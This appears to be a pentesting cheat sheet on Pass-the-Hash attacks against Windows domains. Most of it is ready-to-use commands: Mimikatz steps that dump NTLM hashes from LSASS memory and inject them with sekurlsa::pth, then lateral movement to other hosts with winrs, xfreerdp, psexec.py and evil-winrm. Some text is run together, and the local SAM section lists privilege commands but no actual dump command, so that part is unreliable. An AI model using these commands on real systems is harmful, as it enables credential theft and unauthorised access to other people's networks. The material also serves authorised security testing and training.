Pass The Hash
AdministratorsThe NTLM Challenge sent during Authentication can be responded to just by knowing the Password Hash. This means we can Authenticate without requiring the plaintext password to be known.
Instead of having to crack NTLM Hashes, if the Windows Domain is configured to use NTLM Authentication, we can Pass-the-Hash (PTH) and Authenticate Successfully.
SAM
Local Users on the machine. No Domain User's hashes will be available.:: Extracting NTLM Hashes from Local SAM
privilege::debug
token::elevate
LSASS
Local Users and any Domain User that has recently Logged onto the Machine.:: Extracting NTLM Hashes from LSASS Memory
privilege::debug
token::elevate
sekurlsa::msv
Using The Hashes
We can use the Extracted Hashes to perform a Pass-the-Hash Attack by using Mimikatz to Inject an Access Token for the Victim User on a Reverse Shell or any other Command.
If we run the whoami Command on this Shell, it will still show us the Original User before doing PTH, but any Command run from here will actually use the Credentials Injected using PTH.
:: Reverts the Previous Token
token::revert
:: Pass-the-Hash
sekurlsa::pth /user:USER /domain:TARGET /ntlm:HASH /run:"Command/PAYLOAD To Run"
:: Command Example
/run:"cmd.exe"
Once we have a Command Prompt with the Credentials Loaded we can use winrs to connect to another TARGET on the Domain since the Credentials are Injected into our Session.
:: The [Username - Password] Fields are not Necessary because the Credentials are already Injected
winrs.exe -r:TARGET cmd
Other Ways of Connecting
We can use these Tools to connect to the Target.
- Remote Desktop
- PsExec
- Evil-WinRM
xfreerdp /v:TARGET /u:DOMAIN\\USERNAME /pth:NTLM_HASH
psexec.py -hashes ":NTLM_HASH" DOMAIN/USER@TARGET
evil-winrm -i TARGET -u USERNAME -H NTLM_HASH